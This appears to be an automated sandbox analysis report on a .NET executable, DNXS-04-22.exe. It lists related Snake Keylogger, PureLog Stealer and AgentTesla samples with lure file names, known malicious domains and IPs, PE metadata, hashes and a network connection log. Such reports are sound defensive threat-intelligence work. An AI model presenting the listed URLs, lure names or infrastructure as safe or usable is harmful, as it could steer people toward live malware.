                                          104.21.27.85PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              scratchdreams.tkPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.169.18
                                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.169.18
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 172.67.169.18
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.169.18
                                                              PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.169.18
                                                              Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              checkip.dyndns.comPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 193.122.130.0
                                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 132.226.8.169
                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                              • 193.122.130.0
                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                              • 193.122.6.168
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              order.exeGet hashmaliciousUnknownBrowse
                                                              • 158.101.44.242
                                                              reallyfreegeoip.orgPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.177.134
                                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 172.67.177.134
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 172.67.177.134
                                                              BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.177.134
                                                              gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 172.67.177.134
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                              • 104.21.25.202
                                                              SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exeGet hashmaliciousRisePro StealerBrowse
                                                              • 104.26.5.15
                                                              Fizet#U00e9s,pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.13.205
                                                              G1lnGpOLK4.exeGet hashmaliciousNjratBrowse
                                                              • 104.20.3.235
                                                              https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.2.184
                                                              http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                              • 104.26.9.44
                                                              https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                              • 104.16.117.116
                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                              • 104.18.91.62
                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                              • 104.18.89.62
                                                              ORACLE-BMC-31898USPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 193.122.130.0
                                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              https://meet.servers.getgo.com/opener/e30.eyJpYXQiOjE3MTQ0OTcwOTYsImxhdW5jaFBhcmFtcyI6eyJidWlsZCI6IjE5OTUwIiwidGVsZW1ldHJ5VVJMIjoiaHR0cHM6Ly9sYXVuY2hzdGF0dXMuZ2V0Z28uY29tL2xhdW5jaGVyMi90ZWxlbWV0cnkvaGVscGVyP3Rva2VuPWcybS1yNGFnZXJmbmM4eGM1YnQwb2ZwY2poZC1iMTk5NTAtc2Nsc0pvaW5fYjBmZGI5NjFfNjM2OF80YTU2XzgwMTFfMmI0ZTlmYjEzNmRmIiwiZW5kcG9pbnRQYXJhbXMiOnsiUHJvZHVjdCI6ImcybSIsInNlc3Npb25UcmFja2luZ0lkIjoiY2xzSm9pbi1iMGZkYjk2MS02MzY4LTRhNTYtODAxMS0yYjRlOWZiMTM2ZGYiLCJsYXVuY2hVcmwiOiJtZWV0aW5nP3Nlc3Npb25UcmFja2luZ0lkPWNsc0pvaW4tYjBmZGI5NjEtNjM2OC00YTU2LTgwMTEtMmI0ZTlmYjEzNmRmJmNsaWVudEdlbmVyYXRpb249cm9sbGluZyIsImVudiI6ImxpdmUifX0sInZlcnNpb24iOiIxLjAiLCJmbG93VHlwZSI6ImpvaW4iLCJlbmRwb2ludEZsYXZvciI6eyJmbGF2b3IiOiJuZXV0cm9uIiwiZmxhdm9yRW5mb3JjZWQiOiJ0cnVlIn0sImlzRmxhdm9yRmluYWwiOnRydWV9.e30Get hashmaliciousUnknownBrowse
                                                              • 150.136.248.95
                                                              FiddlerSetup.5.0.20242.10753-latest.exe.7zGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              • 192.29.11.142
                                                              0t102oBJAv.elfGet hashmaliciousMiraiBrowse
                                                              • 150.136.104.140
                                                              0Vjz9RSZxz.elfGet hashmaliciousMiraiBrowse
                                                              • 130.61.43.131
                                                              BnH5cceMGl.elfGet hashmaliciousMiraiBrowse
                                                              • 193.122.239.169
                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                              • 193.122.130.0
                                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                              • 193.122.6.168
                                                              CLOUDFLARENETUSPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                              • 104.21.25.202
                                                              SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exeGet hashmaliciousRisePro StealerBrowse
                                                              • 104.26.5.15
                                                              Fizet#U00e9s,pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.26.13.205
                                                              G1lnGpOLK4.exeGet hashmaliciousNjratBrowse
                                                              • 104.20.3.235
                                                              https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.2.184
                                                              http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                              • 104.26.9.44
                                                              https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                              • 104.16.117.116
                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                              • 104.18.91.62
                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                              • 104.18.89.62
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              54328bd36c14bd82ddaa0c04b25ed9adPO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              G1lnGpOLK4.exeGet hashmaliciousNjratBrowse
                                                              • 104.21.67.152
                                                              SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.67.152
                                                              SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                              • 104.21.67.152
                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                              • 104.21.67.152
                                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                              • 104.21.67.152
                                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.67.152
                                                              https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                              • 104.21.67.152
                                                              3b5074b1b5d032e5620f69f9f700ff0eDekontu.lnk.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.21.27.85
                                                              PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 104.21.27.85
                                                              Fizet#U00e9s,pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.21.27.85
                                                              SOLICITUD DE PRESUPUESTO.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.21.27.85
                                                              PURCHASE ORDER_31062248.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.21.27.85
                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                              • 104.21.27.85
                                                              NOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 104.21.27.85
                                                              https://portal.cpscompressors.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                              • 104.21.27.85
                                                              Iauncher.exeGet hashmaliciousRedLineBrowse
                                                              • 104.21.27.85
                                                              Iauncher.exeGet hashmaliciousRedLineBrowse
                                                              • 104.21.27.85
                                                              No context
                                                              No created / dropped files found
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.341884719013765
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:DNXS-04-22.exe
                                                              File size:888'832 bytes
                                                              MD5:64932c473d74fbdfdb706a094543cf37
                                                              SHA1:f19b8960681b56cab45a9f14871108cf4d522251
                                                              SHA256:8b9dedaa09d239667dd9cabe0c7efab61712868b32ebb3a50110df8980823ce9
                                                              SHA512:1f662c50b378e5be0dc6faec894fb7266417b5ac2952583efdb6801f873bd5c52e3a6d8d001491ee668c1142456ef33d606f2be7be6749840ac819b70d0023dd
                                                              SSDEEP:12288:y2iNzeWFm+1okFwe6N9LtinuoFZK4s5ehC3s5IrA6tN/uYiXdwsh:y1tRFm+1okFPOtT4OgC3s5IlNxi
                                                              TLSH:28155DD1F1508D9AE96B05F2BD2BA53024E37E9D54A4810C569ABB1B76F3342209FF0F
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K................0.................. ... ....@.. ....................................@................................
                                                              Icon Hash:aea4accc16a3d9be
                                                              Entrypoint:0x491f9a
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x87074BFA [Mon Oct 14 22:26:02 2041 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              xor al, 37h
                                                              xor eax, 00483839h
                                                              add byte ptr [edi], dh
                                                              xor eax, 46514B34h
                                                              inc ecx
                                                              inc ebp
                                                              inc edi
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ebx], dh
                                                              inc ecx
                                                              inc esp
                                                              inc ebx
                                                              push ecx
                                                              pop ecx
                                                              dec eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add al, 00h
                                                              add eax, dword ptr [eax]
                                                              add byte ptr [eax], al
                                                              xor byte ptr [eax], al
                                                              add byte ptr [eax+0000000Eh], al
                                                              nop
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              test al, 00h
                                                              add byte ptr [eax+00000018h], al
                                                              rol byte ptr [eax], 00000000h
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add al, 00h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              or al, byte ptr [eax]
                                                              add dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              fadd dword ptr [eax]
                                                              add byte ptr [eax+00000002h], al
                                                              lock add byte ptr [eax], al
                                                              add byte ptr [ebx], 00000000h
                                                              add byte ptr [eax], al
                                                              or byte ptr [ecx], al
                                                              add byte ptr [eax+00000004h], al
                                                              and byte ptr [ecx], al
                                                              add byte ptr [eax+00000005h], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x91f460x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x48b08.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8fff00x70.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x8ffc00x9000023535d0fce5f90ab80d1442c71aa08ddFalse0.9517567952473959data7.955380797779595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x920000x48b080x48c00d54f1b070a21becf5ae461767ddbd1e7False0.06335910652920962data4.769857157185432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xdc0000xc0x20096e2b08ea7a02a7d621895485b579d25False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x922e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                              RT_ICON0x929480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                              RT_ICON0x92c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                              RT_ICON0x92d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                              RT_ICON0x93c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                              RT_ICON0x944a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                              RT_ICON0x94a100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                              RT_ICON0xd6a380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                              RT_ICON0xd8fe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                              RT_ICON0xda0880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                              RT_GROUP_ICON0xda4f00x92data0.5753424657534246
                                                              RT_VERSION0xda5840x398OpenPGP Public Key0.4217391304347826
                                                              RT_MANIFEST0xda91c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                              DLLImport
                                                              mscoree.dll_CorExeMain
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              May 2, 2024 08:00:15.813343048 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:15.921458006 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:15.921549082 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:15.921848059 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:16.030081987 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:17.675807953 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:17.683197975 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:17.791400909 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:20.283941031 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:20.355406046 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:20.789751053 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:20.789793015 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:20.789849043 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:20.803563118 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:20.803579092 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:20.990716934 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:20.990799904 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:20.997865915 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:20.997890949 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:20.998167992 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:21.042924881 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:21.087055922 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:21.128123045 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:21.213068962 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:21.213190079 CEST44349711104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:21.213243008 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:21.243136883 CEST49711443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:21.250121117 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:21.358424902 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:23.359821081 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:23.362519026 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.362554073 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.362618923 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.362891912 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.362901926 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.402391911 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.548300028 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.551197052 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.551218987 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.774733067 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.774842978 CEST44349712104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:23.774898052 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.775338888 CEST49712443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:23.781193018 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.782213926 CEST4971380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.889870882 CEST8049708193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:23.889946938 CEST4970880192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.891509056 CEST8049713193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:23.891654968 CEST4971380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.891745090 CEST4971380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:23.999748945 CEST8049713193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:25.000273943 CEST8049713193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:25.001538992 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.001590967 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.001650095 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.001890898 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.001908064 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.043083906 CEST4971380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:25.187294960 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.188972950 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.189006090 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.412323952 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.412461996 CEST44349714104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.412549019 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.413003922 CEST49714443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.417268991 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:25.525482893 CEST8049715193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:25.525576115 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:25.525721073 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:25.635013103 CEST8049715193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:25.635040045 CEST8049715193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:25.636691093 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.636753082 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.636836052 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.637135983 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.637151957 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.683592081 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:25.818063021 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:25.819703102 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:25.819746017 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:26.041410923 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:26.041528940 CEST44349716104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:26.041608095 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:26.042146921 CEST49716443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:26.045969963 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:26.046597004 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:26.154078007 CEST8049715193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:26.154151917 CEST4971580192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:26.154376030 CEST8049717193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:26.154450893 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:26.154671907 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:26.262572050 CEST8049717193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:27.696715117 CEST8049717193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:27.697782040 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:27.697814941 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:27.697886944 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:27.698105097 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:27.698116064 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:27.746047974 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:27.882801056 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:27.933540106 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:28.744839907 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:28.744868994 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:28.845112085 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:28.845215082 CEST44349718104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:28.845262051 CEST49718443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:28.845838070 CEST49718443192.168.2.8104.21.67.152
